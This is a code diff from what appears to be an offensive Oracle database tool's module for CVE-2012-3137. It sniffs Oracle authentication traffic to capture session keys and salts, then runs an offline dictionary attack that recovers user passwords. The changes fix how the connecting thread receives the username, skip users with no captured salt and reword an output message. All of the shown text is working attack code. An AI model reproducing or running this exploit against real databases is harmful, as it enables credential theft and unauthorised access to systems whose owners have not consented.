@@ -106,13 +106,13 @@ def customAction(packet):
106106 scapyall .sniff (filter = "tcp and host {0} and port {1}" .format (ip ,port ), count = self .MAX_PACKET_TO_CAPTURE , timeout = self .TIMEOUT , stop_filter = customAction ,store = False )
107107 return sessionKey , salt
108108
109- def __try_to_connect__ (self , args ):
109+ def __try_to_connect__ (self , user ):
110110 '''
111111 Establish a connection to the database
112112 '''
113113 import cx_Oracle
114114 try :
115- connectString = "{0}/{1}@{2}:{3}/{4}" .format (self . args [ ' user' ] , 'aaaaaaa' , self .args ['server' ], self .args ['port' ], self .args ['sid' ])
115+ connectString = "{0}/{1}@{2}:{3}/{4}" .format (user , 'aaaaaaa' , self .args ['server' ], self .args ['port' ], self .args ['sid' ])
116116 logging .debug ("Connecting with {0}" .format (connectString ))
117117 cx_Oracle .connect (connectString )
118118 except Exception , e :
@@ -127,7 +127,7 @@ def getAPassword(self,user):
127127 logging .debug ("Waiting 3 seconds" )
128128 sleep (3 )
129129 logging .debug ("Connection to the database via a new thread with the username {0}" .format (self .args ['user' ]))
130- b = Thread (None , self .__try_to_connect__ , None , (), {'args' : self . args })
130+ b = Thread (None , self .__try_to_connect__ , None , (), {'user' : user })
131131 b .start ()
132132 b .join ()
133133 a .join ()
@@ -185,21 +185,24 @@ def decryptKeys(self, sessionFile, passwdFile):
185185 fsession = open (sessionFile )
186186 for session in fsession :
187187 user , session_hex , salt_hex = session .replace ('\n ' ,'' ).replace ('\t ' ,'' ).split (self .separator )
188- self .args ['print' ].subtitle ("Searching the password of the {0} user" .format (user ))
189- fpasswd = open (passwdFile )
190- pbar ,nb = ProgressBar (widgets = ['' , Percentage (), ' ' , Bar (),' ' , ETA (), ' ' ,'' ], maxval = nbpasswds ).start (), 0
191- for password in fpasswd :
192- nb += 1
193- pbar .update (nb )
194- password = password .replace ('\n ' ,'' ).replace ('\t ' ,'' )
195- session_id = self .__decryptKey__ (session_hex .decode ('hex' ),salt_hex .decode ('hex' ),password )
196- if session_id [40 :] == '\x08 \x08 \x08 \x08 \x08 \x08 \x08 \x08 ' :
197- self .passwdFound .append ([user ,password ])
198- self .args ['print' ].goodNews ("{0} password:{1}" .format (user ,password ))
199- fpasswd .close ()
200- break
201- fpasswd .close ()
202- pbar .finish ()
188+ if session_hex == '[]' or salt_hex == '[]' :
189+ logging .info ("There is not salt or session for '{0}', nothing to do!" .format (user ))
190+ else :
191+ self .args ['print' ].subtitle ("Searching the password of the {0} user" .format (user ))
192+ fpasswd = open (passwdFile )
193+ pbar ,nb = ProgressBar (widgets = ['' , Percentage (), ' ' , Bar (),' ' , ETA (), ' ' ,'' ], maxval = nbpasswds ).start (), 0
194+ for password in fpasswd :
195+ nb += 1
196+ pbar .update (nb )
197+ password = password .replace ('\n ' ,'' ).replace ('\t ' ,'' )
198+ session_id = self .__decryptKey__ (session_hex .decode ('hex' ),salt_hex .decode ('hex' ),password )
199+ if session_id [40 :] == '\x08 \x08 \x08 \x08 \x08 \x08 \x08 \x08 ' :
200+ self .passwdFound .append ([user ,password ])
201+ self .args ['print' ].goodNews ("{0} password:{1}" .format (user ,password ))
202+ fpasswd .close ()
203+ break
204+ fpasswd .close ()
205+ pbar .finish ()
203206 fsession .close ()
204207 return self .passwdFound
205208
@@ -272,7 +275,7 @@ def runCVE20123137Module(args):
272275 cve .getPasswords ()
273276 keys = cve .getKeys ()
274277 if keys != []:
275- args ['print' ].goodNews ("Here are keys:\n \n {0}" .format ('\n ' .join (keys )))
278+ args ['print' ].goodNews ("Here are keys:\n \n {0}\n \n If for some users keys are empty, there was an error during capture or this Oracle user does not exist on the database " .format ('\n ' .join (keys )))
276279 filename = "sessions-{0}-{1}-{2}{3}" .format (args ['server' ],args ['port' ],args ['sid' ],CHALLENGE_EXT_FILE )
277280 f = open (filename ,"w" )
278281 f .write ('\n ' .join (keys ))
0 commit comments